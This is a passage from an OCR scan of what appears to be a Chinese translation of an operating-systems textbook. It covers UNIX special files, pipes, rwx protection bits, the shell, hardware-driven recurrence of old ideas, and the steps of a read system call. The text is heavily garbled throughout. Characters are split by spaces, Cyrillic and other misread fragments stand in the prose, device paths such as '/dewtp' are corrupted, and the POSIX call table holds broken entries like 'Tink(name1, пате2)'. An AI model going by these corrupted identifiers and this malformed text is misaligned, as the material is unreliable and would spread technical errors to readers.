在 单个 树 上 。 

在 UNIX 中 ， 另 一 个 重要 的 概念 是 特殊 文件 (special file)。 提 供 特 殊 文 件 是 为 了 使 1O 设 备 看 起 来 像 
文件 一 般 。 这 样 ， 就 像 使 用 系统 调用 读 写 文件 一 样 ，I/O 设 备 也 可 通过 同样 的 系统 调用 进行 读 写 。 有 两 
类 特殊 文件 ， 块 特殊 文件 (block special file) 和 字符 特殊 文件 (character special file)。 块 特殊 文件 指 那 
些 由 可 随机 存 取 的 块 组 成 的 设备 ， 如 磁盘 等 。 比 如 打开 一 个 块 特殊 文件 ， 然 后 读 第 4 块 ， 程 序 可 以 直接 
访问 设备 的 第 4 块 而 不 必 考 虑 存放 该 文件 的 文件 系统 结构 。 类 似 地 ， 字 符 特殊 文件 用 于 打印 机 、 调 制 解 
调 器 和 其 他 接收 或 输出 字符 流 的 设备 。 按 照 惯例 ， 特 殊 文 件 保存 在 /dev 目 录 中 。 例 如 ，/dev/lp 是 打印 机 
(曾经 称 为 行 式 打印 机 ) 。 进程 进程 

在 本 节 中 讨论 的 最 后 一 个 特性 既 与 进程 有 关 也 与 文件 有 关 : 管道 。 管道 
管道 (pipe) 是 一 种 虚 文件 ， 它 可 连接 两 个 进程 ， 如 图 1-16 所 示 。 如 果 
进程 A 和 B 希望 通过 管道 对 话 ， 它 们 必须 提前 设置 该 管道 。 当 进程 A 想 КЕ | 
对 进程 B 发 送 数据 时 ， 它 把 数据 写 到 管道 上 ， 仿 佛 管道 就 是 输出 文件 一 EUS 由 管道 连接 的 两 个 进程 
样 。 进 程 B 可 以 通过 读 该 管道 而 得 到 数据 ， 仿 佛 该 管道 就 是 一 个 输入 文件 一 样 。 这 样 ， 在 UNIX 中 两 个 进 
程 之 间 的 通信 就 很 类 似 于 普通 文件 的 读 写 了 。 更 为 强大 的 是 ， 若 进程 要 想 发 现 它 所 写 人 的 输出 文件 不 是 
真正 的 文件 而 是 管道 ， 则 需要 使 用 特殊 的 系统 调用 。 文 件 系统 是 非常 重要 的 。 我 们 将 在 第 6 章 ， 以 及 第 
10 章 和 第 11 章 中 具体 讨论 它们 。 


1.5.4 输入 /输出 

所 有 的 计算 机 都 有 用 来 获取 输入 和 产生 输出 的 物理 设备 。 毕 竞 , 如 果 用 户 不 能 告诉 计算 机 该 做 什么 ， 
而 在 计算 机 完成 了 所 要 求 的 工作 之 后 竟 不 能 得 到 结果 ， 那 么 计算 机 还 有 什么 用 处 呢 ? 有 各 种 类 型 的 输入 
和 输出 设备 ， 包 括 键盘 、 显 示 器 、 打 印 机 等 。 对 这 些 设备 的 管理 全 然 依靠 操作 系统 。 

所 以 ,每 个 操作 系统 都 有 管理 其 1/O 设 备 的 /0 子 系统 。 某 些 1/O 软 件 是 设备 独立 的 ， 即 这 些 1/O 软 件 
部 分 可 以 同样 应 用 于 许多 或 者 全 部 的 MO 设备 上 。IO 软 件 的 其 他 部 分 ， 如 设备 驱动 程序 ， 是 专门 为 特定 
的 VO 设 备 设计 的 。 在 第 5 章 中 ， 我 们 将 讨论 1O 软 件 。 


1.5.5 保护 

计算 机 中 有 大 量 的 信息 ， 用 户 经 常 希望 对 其 进行 保护 ， 并 保守 秘密 。 这 些 信息 可 包括 电子 邮件 、 商 
业 计划 、 退 税 等 诸多 内 容 。 管 理 系统 的 安全 性 完全 依靠 操作 系统 ， 例 如 ， 文 件 仅 供 授权 用 户 访问 。 

作为 一 个 简单 的 例子 ， 以 便 读 者 对 如 何 实现 安全 有 一 个 概念 ， 请 考察 UNIX。UNIX 操 作 系统 通过 对 
每 个 文件 赋予 一 个 9 位 的 二 进 制 保护 代码 ， 对 UNIX 中 的 文件 实现 保护 。 该 保护 代码 有 三 个 3 位 字段 ， 一 
个 用 于 所 有 者 ， 一 个 用 于 所 有 者 同 组 (用 户 被 系统 管理 员 划 分 成 组 ) 中 的 其 他 成 员 ， 而 另 一 个 用 于 其 他 
А. 每 个 字段 中 有 一 位 用 于 读 访问 ， 一 位 用 于 写 访问 ， 一 位 用 于 执行 访问 。 这 些 位 就 是 知名 的 rwx 位 。 
例如 ， 保 护 代码 rwxr-x--x 的 含义 是 所 有 者 可 以 读 、 写 或 执行 该 文件 ， 其 他 的 组 成 员 可 以 读 或 执行 (但 不 
能 写 ) 该 文件 ,而 其 他 人 可 以 执行 (但 不 能 读 和 写 ) 该 文件 。 对 一 个 目录 而 言 ，x 的 含义 是 允许 查询 。 
一 条 短 横 线 的 含义 是 ， 不 存在 对 应 的 许可 。 

除了 文件 保护 之 外 ， 还 有 很 多 有 关 安 全 的 问题 存在 。 保 护 系统 不 被 人 类 或 非 人 类 (如 病毒 ) AR, 
则 是 其 中 之 一 。 我 们 将 在 第 9 章 中 研究 各 种 安全 性 问题 。 
1.5.6 shell 

操作 系统 是 进行 系统 调用 的 代码 。 编 辑 器 、 编 译 器 、 汇 编程 序 、 链 接 程 序 以 及 命令 解释 器 等 ， 尽 管 
非常 重要 ， 也 非常 有 用 ， 但 是 它们 确实 不 是 操作 系统 的 组 成 部 分 。 为 了 避免 可 能 发 生 的 混淆 ， 本 节 将 大 
致 介绍 一 下 UNIX 的 命令 解释 器 ， 称 为 shell。 尽 管 shell 本 身 不 是 操作 系统 的 一 部 分 ， 但 它 体现 了 许多 操 
作 系统 的 特性 ， 并 很 好 地 说 明了 系统 调用 的 具体 用 法 。shell 同 时 也 是 终端 用 户 与 操作 系统 之 间 的 界面 ， 
除非 用 户 使 用 的 是 一 个 图 形 用 户 界面 。 有 许多 种 类 的 shell， 如 sh、csh、ksh 以 及 bash 等 。 它 们 全 部 支持 
下 面 所 介绍 的 功能 ， 这 些 功能 可 追溯 到 早期 的 shell ( 即 sh) 。 
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用 户 登 录 时 ,同时 启动 了 一 个 shell。 它 以 终端 作为 标准 输入 和 标准 输出 。 首 先 显示 提示 符 (prompt) ， 
它 可 能 是 一 个 美元 符号 ， 提 示 用 户 shell 正 在 等 待 接收 命令 。 假 如 用 户 键入 

date 
于 是 shell 创 建 一 个 子 进程 ， 并 运行 date 程 序 作为 子 进 程 。 在 该 子 进程 运行 期 间 ，shell 等 待 它 结 束 。 在 子 
进程 结束 后 ，shell 再 次 显示 提示 符 ， 并 等 待 下 一 行 输入 。 

用 户 可 以 将 标准 输出 重 定向 到 一 个 文件 ， 如 键入 : 

date > file 
同样 地 ， 也 可 以 将 标准 输入 重 定 向 ， 如 : 

sort <file1 >file2 
该 命令 调用 sort 程 序 ， 从 filel 中 取得 输入 ， 输 出 送 到 file2。 

可 以 将 一 个 程序 的 输出 通过 管道 作为 另 一 程序 的 输入 ， 因 此 有 

cat е1 file2 file3 | sort >/dev/ip 
所 调用 的 cat 程 序 将 这 三 个 文件 合并 ， 其 结果 送出 到 sort 程 序 并 按 字典 排序 。 sort 的 输出 又 被 重 定向 到 文 
件 /dewtp 中 ， 显 然 ， 这 是 打印 机 。 

如 果 用 户 在 命令 后 加 上 一 个 “&” 符 号 ， 则 shell 将 不 等 待 其 结束 ， 而 直接 显示 出 提示 符 。 所 以 

cat file1 file2 file3 |sort>/dev/lp & 
将 启动 sort 程 序 作为 后 各 任务 执行 ， 这 样 就 可 以 允许 用 户 继续 工作 ， 而 sort 命 令 也 继续 进行 。shell 还 有 许 
多 其 他 有 用 的 特性 ， 由 于 篇 幅 有 限 而 不 能 在 这 里 讨论 。 有 许多 UNIX 的 书籍 具体 地 讨论 了 shell (例如 ， 
Kernighan 和 Pike, 1984, Kochan 和 Wood, 1990, Medinets, 1999, Newham 和 Rosenblatt, 1998, 
Robbins, 1999), 

现在 ， 许 多 个 人 计算 机 使 用 GUI。 事 实 上 ，GUI 与 shell 类 似 ，GUI 只 是 -个 运行 在 操作 系统 顶部 的 
程序 。 在 Linux 系 统 中 ， 这 个 事实 更 加 明显 ， 因 为 用 户 (至 少 ) 可 以 在 两 个 GUI 中 选择 一 个 ，Gnome 和 
KDE, 或 者 干脆 不 用 (使 用 X11 上 的 终端 视窗 )。 在 Windows 中 也 有 可 能 用 不 同 的 程序 代 赫 标 准 的 GUI 梨 
面 (Windows Explorer) ， 这 可 以 通过 修改 注册 表 中 的 某 些 数值 实现 ， 不 过 极 少 有 人 这 样 做 。 
1.5.7 个 体重 复 系统 发 育 

在 达尔 文 的 《物种 起 源 》(On the Origin of the Species) 一 书 出 版 之 后 ， 德 国 动物 学 家 Ernst 
Haeckel 论述 了 “个 体重 复 系统 发 育 ”(ontogeny recapitulates phylogeny) 。 他 这 人 句 话 的 含义 是 ， 一 个 个 
体重 复 着 物种 的 演化 过 程 。 换 句 话说， 在 一 个 卵子 受精 之 后 ， 成 为 人 体 之 前 ， 这 个 卵子 要 经 过 是 鱼 、 是 
猪 等 阶段 。 现 代 生物 学 家 认为 这 是 一 种 粗略 的 简化 ， 不 过 这 种 观点 仍旧 包含 了 真理 的 内 核 部 分 。 

在 计算 机 的 历史 中 ， 类 似 情形 依稀 发 生 。 每 个 新 物种 (大 型 机 、 小 型 计算 机 、 个 人 计算 机 、 掌 上 、 
伐 和 人 式 计算 机 、 智 能 卡 等 )， 无 论 是 硬件 还 是 软件 ， 似乎 都 要 经 过 它们 前 辈 的 发 展 阶 段 。 计 算 机 科学 和 
许多 领域 一 样 ， 主 要 是 由 技术 驱动 的 。 古 罗马 人 缺少 汽车 的 原因 不 是 因为 他 们 非常 喜欢 步行 ， 是 因为 他 
们 不 知道 如 何 造 汽车 。 个 人 计算 机 的 存在 ， 不 是 因为 成 百 万 的 人 们 有 几 个 世纪 被 压抑 的 拥有 一 台 计算 机 
的 愿望 ,而 是 因为 现在 可 以 很 便宜 地 制造 它们 。 我 们 常常 忘 了 技术 是 如 何 影响 着 我 们 对 各 种 系统 的 观点 ， 
所 以 有 时 值得 再 仔细 考虑 它们 。 

特别 地 ， 技 术 的 变化 会 导致 某 些 思想 过 时 并 迅速 消失 ， 这 种 情形 经 常 发 生 。 但 是 ， 技 术 的 另 一 种 变 
化 还 可 能 再 次 复活 某 些 思想 。 在 技术 的 变化 影响 了 某 个 系统 不 同 部 分 之 间 的 相对 性 能 时 ， 情 况 就 会 是 这 
样 。 例 如 ， 当 CPU 远 快 于 存储 器 时 ， 为 了 加 速 “ 慢 速 ”的 存储 器 ， 高 速 缓存 是 很 重要 的 。 某 一 天 ， 如 果 
新 的 存储 器 技术 使 得 存储 器 远 快 于 CPU 时 ， 高 速 缓存 就 会 消失 。 而 如 果 新 的 CPU 技术 又 使 CPU 远 快 于 存 
储 器 时 ， 高 速 缓存 就 会 再 次 出 现 。 在 生物 学 上 ， 消 失 是 永远 的 ， 但 是 在 计算 机 科学 中 ， 这 一 种 消失 有 时 
不 过 只 有 几 年 时 间 。 

在 本 书 中 ， 暂 时 消失 的 结果 会 造成 我 们 有 时 需要 反复 考察 一 些 “ 过 时 ”的 概念 ， 即 那些 在 当代 技术 
中 并 不 理想 的 思想 。 而 技术 的 变化 会 把 一 些 “ 过 时 概念 ” 带 同 来 。 正 由 于 此 ， 更 重要 的 是 要 理解 为 什么 
一 个 概念 会 过 时 ， 而 什么 样 环境 的 变化 又 会 启用 “过 时 概念 "。 
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为 了 把 这 个 观点 叙述 得 更 透彻 ， 我 们 考虑 一 些 例子 。 早 期 计算 机 采用 了 硬 连 线 指令 集 。 这 种 指令 可 
由 硬件 直接 执行 ， 且 不 能 改变 。 然 后 出 现 了 微 程 序 设计 (首先 在 IBM 360 上 大 规模 引入 ) ， 其 中 的 解释 器 执 
行 软件 中 的 指令 。 于 是 硬 连 线 执行 过 时 了 ， 因 为 不 够 灵活 。 接 着 发 明了 RISC 计 算 机 ， 微 程序 设计 ( 即 解 
释 执 行 ) 过 时 了 ， 这 是 因为 直接 执行 更 快 。 而 在 通过 Internet 发 送 并 且 到 达 时 才 解 释 的 Java 小 程序 形式 中 ， 
我 们 又 看 到 了 解释 执行 的 复苏 。 执 行 速度 并 不 总 是 关键 因素 ， 但 由 于 网 络 的 时 间 延 迟 是 如 此 之 大 ， 以 至 于 
它 成 了 主要 因素 。 这 样 ， 钟 摆 在 直接 执行 和 解释 之 间 已 经 晃动 了 好 儿 个 周期 ， 也 许 在 未 来 还 会 再 次 几 动 。 

1. 大 型 内 存 

现在 来 分 析 硬 件 的 某 些 历史 发 展 过 程 ， 并 看 看 硬件 是 如 何 重复 地 影响 软件 的 。 第 一 代 大 型 机 内 存 有 
限 。 在 1959 年 至 1964 年 之 间 ， 称 为 “山寨 王 ”的 IBM 7090 或 7094 满 载 也 只 有 128KB 多 的 内 存 。 该 机 器 
多 数 用 汇编 语言 编程 ， 为 了 节省 内 存 ， 其 操作 系统 用 汇编 语言 编写 。 

随 着 时 代 的 前 进 ， 在 汇编 语言 宣告 过 时 时 ，FORTRAN 和 COBOL 一 类 语言 的 编译 器 已 经 足够 好 了 。 
但 是 在 第 一 个 商用 小 型 计算 机 (PDP-1) 发 布 时 ， 却 只 有 4096 个 18 位 字 的 内 存 ， 而 且 令 人 吃惊 的 是 ， 汇 
编 语言 又 回来 了 。 最 终 ， 小 型 计算 机 获得 了 更 多 的 内 存 ， 而 且 高 级 语言 也 在 小 型 机 上 盛行 起 来 。 

在 20 世 纪 80 年 代 早期 ,微型 计算 机 出 现时 ， 第 一 批 机 器 只 有 4 KB 内 存 ， 汇 编 语言 又 复活 了 。 КА 
式 计算 机 经 常 使 用 和 微型 计算 机 一 样 的 CPU 芯 片 (8080、Z80、 后 来 的 8086) 而 且 一 开始 也 使 用 汇编 编 
та, 现在， 它们 的 后 代 ， 个 人 计算 机 拥有 大 量 的 内 存 ， 使 用 C、C++、Java 和 其 他 高 级 语言 编程 。 智 能 
卡 正在 走 着 类 似 的 发 展 道路 ， 而 且 除 了 确定 的 大 小 之 外 ， 智 能 卡通 常 使 用 Java 解 释 器 ， 解 释 执行 Java 程 
序 ， 而 不 是 将 Java 编 译 成 为 智能 卡 的 机 器 语言 。 

2. 保 护 硬件 

早期 的 BM 7090/7094 一 类 大 型 机 ， 没 有 保护 硬件 ， 所 以 这 些 机 器 一 次 只 运行 一 个 程序 。 一 个 有 问 
题 的 程序 就 可 能 毁 掉 操 作 系统 ， 并 且 很 容易 使 机 器 崩溃 。 在 IBM 360 发 布 时 ， 提 供 了 保护 硬件 的 原型 ， 
这 些 机 器 可 以 在 内 存 中 同时 保持 若干 程序 ， 并 让 它们 轮流 运行 (多 道 程序 处 理 ) 。 于 是 单 道 程序 处 理 宣 
告 过 时 。 

至 少 是 到 了 第 一 个 小 型 计算 机 出 现时 一 一 还 没有 保护 硬件 一 一 所 以 多 道 程序 处 理 也 不 可 能 有 。 尽 管 
PDP-1 和 PDP-8 没 有 保护 硬件 ， 但 是 PDP-11 型 机 器 有 了 保护 硬件 ， 这 一 特点 导致 了 多 道 程序 处 理 的 应 用 ， 
并 且 最 终 导致 UNIX 操 作 系统 的 诞生 。 

在 建造 第 一 代 微型 计算 机 时 ， 使 用 了 Intel 8080 CPU 芯片 ， 但 是 没有 保护 硬件 ， 这 样 我 们 又 回 到 了 
单 道 程序 处 理 。 直 到 Intel 80286 才 增加 了 保护 硬件 ， 于 是 有 了 多 道 程序 处 理 。 直 到 现在 ， 许 多 嵌入 式 系 
统 仍旧 没有 保护 硬件 ， 而 且 只 运行 单个 程序 。 

现在 来 考察 操作 系统 。 第 一 代 大 型 机 原本 没有 保护 硬件 ， 也 不 支持 多 道 程序 处 理 ， 所 以 这 些 机 器 只 
运行 简单 的 操作 系统 ， 一 次 手工 只 能 装载 一 个 程序 。 后 来 ， 大 型 机 有 了 保护 硬件 ， 操 作 系统 可 以 同时 支 
持 运 行 多 个 程序 ， 接 着 系统 拥有 了 全 功能 的 分 时 能 力 。 

在 小 型 计算 机 刚 出 现时 ， 也 没有 保护 硬件 ， 一 次 只 运行 一 个 手工 装载 的 程序 。 逐 渐 地 ， 小 型 机 有 了 
保护 硬件 ， 有 了 同时 运行 两 个 或 更 多 程序 的 能 力 。 第 一 代 微 型 计算 机 也 只 有 一 次 运行 一 个 程序 的 能 力 ， 
但 是 随后 具有 了 多 道 程序 的 能 力 。 掌 上 计算 机 和 智能 卡 也 走 着 类 似 的 发 展 之 路 。 

在 所 有 这 些 案例 中 ， 软 件 的 发 展 是 受制 于 技术 的 。 例 如 ， 第 一 代 微 型 计算 机 有 约 4KB 内 存 ， 没 有 保护 
硬件 。 高 级 语言 和 多 道 程序 处 理 对 于 这 种 小 系统 而 言 ， 无 法 获得 支持 。 随 着 微型 计算 机 演化 成 为 现代 个 人 
计算 机 ， 拥 有 了 必要 的 硬件 ， 从 而 有 了 必须 的 软件 处 理 以 支持 多 种 先进 的 功能 。 这 种 演化 过 程 看 来 还 要 继 
续 多 年 。 其 他 的 领域 也 有 类 似 的 这 种 轮回 现象 ， 但 是 在 计算 机 行业 中 ， 这 种 轮回 现象 似乎 变化 得 更 快 。 

3. 硬盘 

早期 大 型 机 主要 是 基于 磁带 的 。 机 器 从 磁带 上 读 和 程序、 编译、 运行 并 把 结果 写 到 另 一 个 磁带 上 。 
那 时 没有 磁盘 也 没有 文件 系统 的 概念 。 在 IBM 于 1956 年 引入 第 一 个 磁盘 一 RAMAC (RAndoM АСсевв) 
之 后 ,事情 开始 变化 。 这 个 磁盘 占据 4 平方 米 空间 ， 可 以 存储 5 百 万 7 位 长 的 字符 ， 这 足够 存储 一 张 中 等 
分 辨 率 的 数字 照片 。 但 是 其 年 租金 高 达 35 000 美 元 ， 比 存储 占据 同样 空间 数量 的 胶卷 还 要 贵 。 不 过 这 个 
磁盘 的 价格 终于 还 是 下 降 了 ， 并 开始 出 现 了 原始 的 文件 系统 。 
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拥有 这 些 新 技术 的 典型 机 器 是 CDC 6600， 该 机 器 于 1964 年 发 布 ， 在 多 年 之 内 始终 是 世界 上 最 快 的 
计算 机 。 用 户 可 以 通过 指定 名 称 的 方式 创建 所 谓 “ 永 久 文件 "， 和 希望 这 个 名 称 还 没有 被 别人 使 用 ， 比 如 
“data” 就 是 一 个 适合 于 文件 的 名 称 。 这 个 系统 使 用 单 层 目录 。 后 来 在 大 型 机 上 开发 出 了 复杂 的 多 层 文件 
系统 ，MULTICS 文 件 系统 可 以 算是 多 层 文 件 系统 的 顶峰 。 

接着 小 型 计算 机 投入 使 用 ， 该 机 型 最 后 也 有 了 硬盘 。1970 年 在 PDP-11 上 引入 了 标准 硬盘 ，RK05 磁 
盘 ， 容 量 为 2.5MB， 只 有 1IBM RAMAC 一 半 的 容量 ， 但 是 这 个 磁盘 的 直径 只 有 40 厘 米 ，5 厘 米 高 。 不 过 ， 
其 原型 也 只 有 单 层 目录 。 随 着 微型 计算 机 的 出 现 ，CP/M 开 始 成 为 操作 系统 的 主流 ， 但 是 它 也 只 是 在 
( 软 ) 盘 上 支持 单 目 录 。 

4. АШАА 

虚拟 内 存 (安排 在 第 3 章 中 讨论 )， 通 过 在 RAM 和 磁盘 中 反复 移动 信息 块 的 方式 ， 提 供 了 运行 比 机 
器 物理 内 存 大 的 程序 能 力 。 虚 拟 内 存 也 经 历 了 类 似 的 历程 ， 首 先 出 现在 大 型 机 上 ， 然 后 是 小 型 机 和 微 
型 机 。 虚 拟 内 存 还 使 得 程序 可 以 在 运行 时 动态 地 链接 库 ， 而 不 是 必须 在 编译 时 链接 。MULTICS 是 第 一 
个 可 以 做 到 这 点 的 系统 。 最 终 ， 这 个 思想 传播 到 所 有 的 机 型 上 ， 现 在 广泛 用 于 多 数 UNIX 和 Windows 系 
统 中 。 

在 所 有 这 些 发 展 过 程 中 我们 看 到 ， 在 一 种 环境 中 出 现 的 思想 ， 随 着 环境 的 变化 被 抛弃 (汇编 语言 
设计 ， 单 道 程序 处 理 ， 单 层 目录 等 )， 通 常 在 十 年 之 后 ， 该 思想 在 另 一 种 环境 下 又 重 现 了 。 由 于 这 个 原 
因 ， 本 书 中 ， 我 们 将 不 时 回顾 那些 在 今日 的 G 字 节 PC 机 中 过 时 的 思想 和 算法 ， 因 为 这 些 思想 和 算法 可 能 
会 在 颈 入 式 计 算 机 和 智能 卡 中 再 现 。 


1.6 系统 调用 

我 们 已 经 看 到 操作 系统 具有 两 种 功能 : 为 用 户 程序 提供 抽象 和 管理 计算 机 资源 。 在 多 数 情形 下 ， 用 
户 程序 和 操作 系统 之 间 的 交互 处 理 的 是 前 者 ， 例 如 ， 创 建 、 写 入 、 读 出 和 删除 文件 。 对 用 户 而 言 ， 资 源 
管理 部 分 主要 是 透明 和 自动 完成 的 。 这 样 ， 用 户 程序 和 操作 系统 之 间 的 交互 主要 就 是 处 理 抽象 。 为 了 真 
正 理解 操作 系统 的 行为 ， 我 们 必须 仔细 地 分 析 这 个 接口 。 接口 中 所 提供 的 调用 随 着 操作 系统 的 不 同 而 变 
化 (尽管 基于 的 概念 是 类 似 的 )。 

这 样 我 们 不 得 不 在 如 下 的 可 能 方式 中 进行 选择 ，(1) 含混 不 清 的 一 般 性 叙述 (“操作 系统 提供 读 取 
文件 的 系统 调用 ") ， (2) 某 个 特定 的 系统 (“UNIX 提 供 一 个 有 三 个 参数 的 read 系 统 调用 : 一 个 参数 指 
定 文件 ， 一 个 说 明 数据 应 存放 的 位 置 ， 另 一 个 说 明 应 读 出 多 少 个 字 节 ”)。 

我 们 选择 后 一 种 方式 。 这 种 方式 需要 更 多 的 努力 ， 但 是 它 能 更 多 地 洞察 操作 系统 具体 在 做 什么 。 尽 
管 这 样 的 讨论 会 涉及 专门 的 POSIX (International Standard 9945-1), 以 及 UNIX、System V、BSD、 
Linux、MINIX3 等 , 但 是 多 数 现代 操作 系统 都 有 实现 相同 功能 的 系统 调用 ， 尽管 它们 在 细节 上 差别 很 大 。 
由 于 引发 系统 调用 的 实际 机 制 是 非常 依赖 于 机 器 的 ， 而 且 必须 用 汇编 代码 表达 ， 所 以 ， 通 过 提供 过 程 库 
使 C 程 序 中 能 够 使 用 系统 调用 ， 当 然 也 包括 其 他 语言 。 

记 住 下 列 事项 是 有 益 的 。 任何 单 CPU 计 算 机 一 次 只 能 执行 一 条 指令 。 如 果 一 个 进程 正在 用 户 态 中 运 
行 一 个 用 户 程序 ， 并 且 需 要 一 个 系统 服务 ， 比 如 从 一 个 文件 读数 据 ， 那么 它 就 必须 执行 一 个 陷阱 或 系统 
调用 指令 ， 将 控制 转移 到 操作 系统 。 操 作 系 统 接着 通过 参数 检查 ， 找 出 所 需要 的 调用 进程 。 然 后 ， 它 执 
行 系统 调用 ， 并 把 控制 返回 给 在 系统 调用 后 面 跟随 着 的 指令 。 在 某 种 意义 上 ， 进 行 系统 调用 就 像 进行 一 
个 特殊 的 过 程 调用 ， 但 是 只 有 系统 调用 可 以 进入 内 核 ， 而 过 程 调 用 则 不 能 。 

为 了 使 系统 调用 机 制 更 清晰 ， 让 我 们 简要 地 考察 read 系 统 调用 。 如 上 所 述 ， 它 有 三 个 参数 : 第 一 个 
参数 指定 文件 ， 第 二 个 指向 缓冲 区 ， 第 三 个 说 明 要 读 出 的 字 节 数 。 几乎 与 所 有 的 系统 调用 一 样 ， 它 的 调 
用 由 C 程 序 完成 ， 方法 是 调用 一 个 与 该 系统 调用 名 称 相同 的 库 过 程 : read。 由 C 程 序 进行 的 调用 可 有 如 
FÉR: 

count = read(fd, buffer, nbytes); 
系统 调用 (以 及 库 过 程 ) 在 count 中 返回 实际 读 出 的 字 节 数 。 这 个 值 通常 和 nbytes 相 同 ， 但 也 可 能 更 小 ， 
例如 ， 如 果 在 读 过 程 中 遇 到 了 文件 尾 的 情形 就 是 如 此 。 
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如 果 系 统 调用 不 能 执行 ， 不 论 是 因为 无 效 的 参数 还 是 磁盘 错误 ，count 都 会 被 置 为 -1， 而 在 全 局 变 
车 errmo 中 放 和 人 错误 号 。 程 序 应 该 经 常 检查 系统 调用 的 结果 ， 以 了 解 是 否 出 错 。 

系统 调用 是 通过 一 系列 的 步骤 实现 的 。 为 了 更 清楚 地 说 明 这 个 概念 ， 考 察 上 面 的 read 调 用 。 在 准备 
调用 这 个 实际 用 来 进行 read 系 统 调用 的 read 库 过 程 时 ， 调 用 程序 首先 把 参数 压 进 堆栈 ， 如 图 1-17 中 步 
RRI ~ PRIT 

由 于 历史 的 原因 ，C 以 及 C++ 编译 器 使 用 逆序 (必须 把 第 一 个 参数 赋 给 printf (格式 字 串 ) ЖЕҢЕ 
栈 的 项 部 )。 第 一 个 和 第 三 个 参数 是 值 调用 ， 但 是 第 二 个 参数 通过 引用 传递 ， 即 传递 的 是 缓冲 区 的 地 址 
(由 有 指示 ) ， 而 不 是 缓冲 区 的 内 容 。 接 着 是 对 库 过 程 的 实际 调用 (第 4 步 ) 。 这 个 指令 是 用 来 调用 所 有 过 
程 的 正常 过 程 调 用 指令 。 

在 可 能 是 由 汇编 语言 写成 的 库 过 程 中 ， 一 般 把 系统 调用 的 编号 放 在 操作 系统 所 期 望 的 地 方 ， 如 寄存 
器 中 (第 5 步 )。 然 后 执行 一 个 TRAP 指 令 ， 将 用 户 态 切换 到 内 核 态 ， 并 在 内 核 中 的 一 个 固定 地 址 开始 执 
{т (第 6 步 )。TRAP 指 令 实际 上 与 过 程 调用 指令 相当 类 似 ， 它们 后 面 都 跟随 一 个 来 自 远 地 位 置 的 指令 ， 
以 及 供 以 后 使 用 的 一 个 保存 在 栈 中 的 返回 地 址 。 

然而 ，TRAP 指 令 与 过 程 指令 存在 两 个 方面 的 差别 。 首 先 ， 它 的 副作用 是 ， 切 换 到 内 核 态 。 而 过 程 
调用 指令 并 不 改变 模式 。 其 次 ， 不 像 给 定 过 程 所 对 或 绝对 地 址 那样 ，TRAP 指 令 不 能 跳 转 到 任意 
地 址 上 。 根 据 机 器 的 体系 结构 ， 或 者 跳 转 到 一 个 单 固定 地 址 上 ， 或 者 指令 中 有 一 8 位 长 的 字段 ， 它 给 定 
了 内 存 中 一 张 表格 的 索引 ， 这 张 表格 中 含有 跳 转 地 址 。 

跟随 在 TRAP 指 令 后 的 内 核 代码 开始 检查 系统 调用 编号 ， 然后 发 出 正确 的 系统 调用 处 理 命令 ， 这 通 
常 是 通过 一 张 由 系统 调用 编号 所 引用 的 、 指 向 系统 调用 处 理 器 的 指针 表 来 完成 (第 7 步 )。 此 时 ， 系 统 调 
用 句柄 运 行 ( 第 8 步 )。 一 旦 系统 调用 句柄 完成 其 工作 ， 控制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指令 中 返回 
给 用 户 空间 库 过 程 (第 9 步 )。 这 个 过 程 接着 以 通常 的 过 程 调用 返回 的 方式 ， 返回 到 用 户 程序 (第 10 步 ) 。 

为 了 完成 整个 工作 ， 用 户 程序 还 必须 清除 堆栈 ， 如 同 它 在 进行 任何 过 程 调 用 之 后 一 样 (第 11 步 ) 。 
假设 堆栈 向 下 增长 ， 如 经 常 所 做 的 那样 ， 编 译 后 的 代码 准确 地 增加 堆栈 指针 值 ， 以 便 清 除 调 用 read 之 前 
压 人 的 参数 。 在 这 之 后 ， 原 来 的 程序 就 可 以 随意 执行 了 。 


地 址 
OxFFFFFFFF 


用 户 空间 


内 核 空间 
(操作 系统 ) 


图 1-17 完成 系统 调用 read 的 1 个 步骤 
在 前 面 第 9 步 中 ， 我 们 提 到 ” 控制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指令 中 返回 给 用 户 空间 库 过 程 "， 
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这 是 有 原因 的 。 系 统 调用 可 能 堵塞 调用 者 ， 避 免 它 继续 执行 。 例 如 ， 如 果 试 图 读 键盘 ， 但 是 并 没有 任何 
键 和 人， 那么 调用 者 就 必须 被 阻塞 。 在 这 种 情形 下 ， 操 作 系统 会 查看 是 否 有 其 他 可 以 运行 的 进程 。 稍 后 ， 
当 需 要 的 输入 出 现时 ， 进 程 会 提醒 系统 注意 ， 然 后 步骤 9~ 步骤 11 会 接着 进行 。 

下 面 几 节 中 ， 我 们 将 考察 一 些 常用 的 POSIX 系 统 调用 ， 或 者 用 更 专业 的 说 法 ， 考 察 进行 这 些 系统 调 
用 的 库 过 程 。POSIX 大 约 有 100 个 过 程 调 用 ， 它 们 中 最 重要 的 过 程 调用 列 在 图 1-18 中 。 为 方便 起 见 ， 它 
们 被 分 成 4 类 。 我 们 用 文字 简要 地 叙述 其 作用 。 

从 广义 上 看 ， 由 这 些 调用 所 提供 的 服务 确定 了 多 数 操作 系统 应 该 具有 的 功能 ， 而 在 个 人 计算 机 上 ， 
资源 管理 功能 是 较 弱 的 〈 至 少 与 多 用 户 的 大 型 机 相 比较 是 这 样 ) 。 所 包含 的 服务 有 创建 与 终止 进程 ， 创 
建 、 删 除 、 读 出 和 写 和 文件， 目录 管理 以 及 完成 输入 输出 。 


进程 管理 
Г а я 说 ш 
pid = fork() g 创建 与 父 进程 相同 的 子 进程 
pid = waitpid(pid, &statloc,options) 等 待 一 个 子 进程 终止 
з = execve(name, argv, environp) 替换 一 个 进程 的 核心 映像 
exit(status) 中 止 进程 执行 并 返回 状态 A 
文件 管理 
调 用 i 说 明 
19 = open(file, how, ...) 打开 一 个 文件 供 读 ， 写 或 两 者 
5 = close(fd) 关闭 一 个 打开 的 文件 | 
n = read(fd, buffer, nbytes) 把 数据 从 一 个 文件 读 到 缓冲 区 中 
n = write(fd, buffer nbytes) 把 数据 从 缓冲 区 写 到 一 个 文件 中 
| position = seek(fd offset, Whence) 移动 文件 指针 
s = stat(name, &buf) 取得 文件 的 状态 信息 | 
目录 和 文件 系统 管理 
= 调 用 说 и 
5 = mkdir(name, mode) 创建 一 个 新 月 录 
s = rmdir(name) СЕЗЕТ 
s = Tink(name1, пате2) 创建 一 个 新 月 录 项 name2， 并 指向 name 1 
s = unlink(name) 副 去 一 个 目录 项 
| s = mount(special, name, fiag) 安装 一 个 文件 系统 
5 = umount(special) 印 载 一 个 文件 系统 
+ 项 
调 用 им j 
5 = chdir(dirname) 改变 工作 目录 
